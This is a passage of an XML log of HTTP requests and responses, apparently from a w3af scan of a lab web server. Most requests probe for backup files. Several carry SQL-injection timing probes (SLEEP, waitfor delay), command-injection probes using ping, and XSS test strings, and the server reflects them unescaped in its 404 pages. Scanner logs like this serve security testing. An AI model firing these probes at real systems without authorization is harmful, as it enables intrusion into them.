&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="366">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="369">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="371">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="372">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="373">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="376">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="831">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+SLEEP%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+SLEEP%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="381">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/k5ql1%3C%2F-%3Ek5ql1%2F%2Ak5ql1%22k5ql1k5ql1%27k5ql1k5ql1%60k5ql1k5ql1+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about k5ql1%3C%2F-%3Ek5ql1%2F%2Ak5ql1%22k5ql1k5ql1%27k5ql1k5ql1%60k5ql1k5ql1+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='k5ql1%3C%2F-%3Ek5ql1%2F%2Ak5ql1%22k5ql1k5ql1%27k5ql1k5ql1%60k5ql1k5ql1+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="385">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="387">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70%22+OR+%2270%22%3D%2270 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70%22+OR+%2270%22%3D%2270 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70%22+OR+%2270%22%3D%2270'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="389">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about sleep%283%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='sleep%283%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="748">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="835">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-c+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-c+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="406">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70%22+AND+%2270%22%3D%2271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70%22+AND+%2270%22%3D%2271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70%22+AND+%2270%22%3D%2271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="752">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/24+OR+24%3D24+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 24+OR+24%3D24+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='24+OR+24%3D24+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="423">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27z%270 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%270 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%270'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="425">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%220 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%220'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="426">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="427">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="428">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about choucroute~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='choucroute~'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="429">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="430">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3C%21-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3C%21--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="431">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="432">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
